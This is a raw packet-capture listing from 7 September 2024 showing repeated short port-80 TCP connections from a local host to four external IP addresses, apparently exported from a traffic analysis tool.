                                                                                                                                                                                                            Sep 7, 2024 15:34:08.900598049 CEST8049727172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:09.377194881 CEST8049727172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:09.377835035 CEST4972780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:09.794083118 CEST4972880192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:09.798965931 CEST804972864.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:09.799076080 CEST4972880192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:09.799185991 CEST4972880192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:09.803771019 CEST4972980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:09.804493904 CEST804972864.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:09.804553986 CEST4972880192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:09.808692932 CEST8049729172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:09.808762074 CEST4972980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:09.820045948 CEST4972980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:09.824824095 CEST8049729172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.293497086 CEST8049729172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.293523073 CEST8049729172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.293596029 CEST4972980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.293710947 CEST4972980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.294125080 CEST4972780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.294488907 CEST4973080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.299117088 CEST8049727172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.299267054 CEST4972780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.299271107 CEST8049730172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.299350977 CEST4973080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.299624920 CEST4973080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.304416895 CEST8049730172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.782083988 CEST8049730172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.782136917 CEST4973080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.919641972 CEST4973180192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.924690962 CEST804973164.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.924763918 CEST4973180192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.924855947 CEST4973180192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.929888964 CEST804973164.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.929964066 CEST804973164.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.930006027 CEST4973180192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.933150053 CEST4973280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.938093901 CEST8049732172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.938164949 CEST4973280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.944789886 CEST4973280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.949649096 CEST8049732172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:11.429979086 CEST8049732172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:11.430202007 CEST8049732172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:11.430253983 CEST4973280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:11.430277109 CEST4973280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:11.430799007 CEST4973080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:11.431199074 CEST6014480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:11.435920000 CEST8049730172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:11.435973883 CEST4973080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:11.436305046 CEST8060144172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:11.436407089 CEST6014480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:11.436605930 CEST6014480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:11.441658020 CEST8060144172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:11.942900896 CEST8060144172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:11.943025112 CEST6014480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.420010090 CEST6014580192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.424909115 CEST806014564.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.425015926 CEST6014580192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.425138950 CEST6014580192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.430315971 CEST806014564.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.432023048 CEST6014580192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.434026003 CEST6014680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.439090014 CEST8060146172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.439201117 CEST6014680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.439306974 CEST6014680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.444293976 CEST8060146172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.943244934 CEST8060146172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.943310022 CEST8060146172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.943440914 CEST6014680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.943568945 CEST6014680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.950589895 CEST6014480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.950896978 CEST6014780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.955609083 CEST8060144172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.955658913 CEST8060147172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.955678940 CEST6014480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.955728054 CEST6014780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.955864906 CEST6014780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.960609913 CEST8060147172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:14.444094896 CEST8060147172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:14.444161892 CEST6014780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.037928104 CEST6014880192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.042819977 CEST806014864.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.042889118 CEST6014880192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.043004036 CEST6014880192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.047203064 CEST6014980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.047998905 CEST806014864.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.048070908 CEST6014880192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.052037001 CEST8060149172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.052108049 CEST6014980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.054189920 CEST6014980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.059137106 CEST8060149172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.564754963 CEST8060149172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.564963102 CEST6014980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.568216085 CEST6014780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.568778038 CEST6015080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.570123911 CEST8060149172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.570169926 CEST6014980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.573523998 CEST8060147172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.573585033 CEST8060150172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.573601961 CEST6014780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.573663950 CEST6015080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.573806047 CEST6015080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.578588963 CEST8060150172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:16.063642025 CEST8060150172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:16.063796997 CEST6015080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:16.697465897 CEST6015180192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:16.702403069 CEST806015188.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:16.702521086 CEST6015180192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:16.710716009 CEST6015180192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:16.715900898 CEST806015188.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:16.715950012 CEST6015180192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:16.721410036 CEST6015280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:16.726489067 CEST8060152172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:16.726577044 CEST6015280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:16.726694107 CEST6015280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:16.731592894 CEST8060152172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:17.209203959 CEST8060152172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:17.209242105 CEST8060152172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:17.209359884 CEST6015280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:17.209541082 CEST6015280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:17.219611883 CEST6015080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:17.219939947 CEST6015380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:17.224597931 CEST8060150172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:17.224672079 CEST6015080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:17.224718094 CEST8060153172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:17.224786997 CEST6015380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:17.224905968 CEST6015380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:17.229736090 CEST8060153172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:17.710038900 CEST8060153172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:17.710180998 CEST6015380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.096313000 CEST6015480192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.101511955 CEST806015445.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.101598978 CEST6015480192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.116662025 CEST6015480192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.121536970 CEST806015445.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.121608973 CEST6015480192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.124228954 CEST6015580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.129002094 CEST8060155172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.129116058 CEST6015580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.129193068 CEST6015580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.134063959 CEST8060155172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.635785103 CEST8060155172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.635878086 CEST8060155172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.635967016 CEST6015580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.636034966 CEST6015580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.639574051 CEST6015380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.639887094 CEST6015680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.645104885 CEST8060156172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.645186901 CEST6015680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.645337105 CEST6015680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.645366907 CEST8060153172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.645450115 CEST6015380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.650178909 CEST8060156172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.125236988 CEST8060156172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.125372887 CEST6015680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.237766027 CEST6015780192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.242983103 CEST806015788.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.243077993 CEST6015780192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.257328987 CEST6015780192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.262458086 CEST806015788.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.262509108 CEST6015780192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.267447948 CEST6015880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.272672892 CEST8060158172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.272764921 CEST6015880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.272953987 CEST6015880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.278037071 CEST8060158172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.759421110 CEST8060158172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.759459019 CEST8060158172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.759525061 CEST6015880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.759622097 CEST6015880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.759979963 CEST6015680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.764029980 CEST6015980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.765038013 CEST8060156172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.765094042 CEST6015680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.768799067 CEST8060159172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.768882990 CEST6015980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.768987894 CEST6015980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.773766041 CEST8060159172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:22.269361019 CEST8060159172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:22.269473076 CEST6015980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:26.955404997 CEST6135180192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:26.960231066 CEST806135145.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:26.960350990 CEST6135180192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:26.960491896 CEST6135180192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:26.964781046 CEST6135280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:26.965439081 CEST806135145.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:26.965519905 CEST6135180192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:26.969593048 CEST8061352172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:26.969680071 CEST6135280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:26.969809055 CEST6135280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:26.974555969 CEST8061352172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:27.472398996 CEST8061352172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:27.472676992 CEST6135280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:27.474227905 CEST8061352172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:27.474292994 CEST6135280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:27.478543043 CEST6015980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:27.478959084 CEST6135380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:27.483617067 CEST8060159172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:27.483695030 CEST6015980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:27.483724117 CEST8061353172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:27.483802080 CEST6135380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:27.483975887 CEST6135380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:27.488827944 CEST8061353172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:27.974005938 CEST8061353172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:27.974081039 CEST6135380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.294297934 CEST6135480192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.299645901 CEST806135464.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.299804926 CEST6135480192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.299933910 CEST6135480192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.303735018 CEST6135580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.304930925 CEST806135464.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.304997921 CEST6135480192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.308628082 CEST8061355172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.308701038 CEST6135580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.308815956 CEST6135580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.313530922 CEST8061355172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.794915915 CEST8061355172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.795016050 CEST8061355172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.795083046 CEST6135580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.795140982 CEST6135580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.795522928 CEST6135380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.795892954 CEST6135680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.800510883 CEST8061353172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.800571918 CEST6135380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.800610065 CEST8061356172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.800693035 CEST6135680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.800782919 CEST6135680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.806519032 CEST8061356172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:29.284914017 CEST8061356172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:29.285083055 CEST6135680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:30.559246063 CEST6135780192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:30.564136028 CEST806135764.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:30.564205885 CEST6135780192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:30.569771051 CEST6135780192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:30.573518991 CEST6135880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:30.574559927 CEST806135764.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:30.574632883 CEST6135780192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:34:30.578366995 CEST8061358172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:30.578439951 CEST6135880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:30.578511000 CEST6135880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:30.583260059 CEST8061358172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:31.065511942 CEST8061358172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:31.065541983 CEST8061358172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:31.065661907 CEST6135880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:31.065798044 CEST6135880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:31.071656942 CEST6135680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:31.071962118 CEST6135980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:31.076771021 CEST8061359172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:31.076844931 CEST6135980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:31.076924086 CEST8061356172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:31.076946020 CEST6135980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:31.076977968 CEST6135680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:31.083197117 CEST8061359172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:31.589180946 CEST8061359172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:31.589262009 CEST6135980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:32.486674070 CEST6136080192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:32.491513968 CEST806136088.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:32.491605997 CEST6136080192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:32.492049932 CEST6136080192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:32.495570898 CEST6136180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:32.496817112 CEST806136088.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:32.496886969 CEST6136080192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:34:32.500335932 CEST8061361172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:32.500386000 CEST6136180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:32.500462055 CEST6136180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:32.505207062 CEST8061361172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:33.011301041 CEST8061361172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:33.011363983 CEST8061361172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:33.011504889 CEST6136180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:33.011611938 CEST6136180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:33.011991024 CEST6135980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:33.012360096 CEST6136280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:33.016976118 CEST8061359172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:33.017069101 CEST6135980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:33.017107964 CEST8061362172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:33.017174006 CEST6136280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:33.017327070 CEST6136280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:34:33.022043943 CEST8061362172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:33.497728109 CEST8061362172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:34:33.497865915 CEST6136280192.168.2.3172.234.222.138
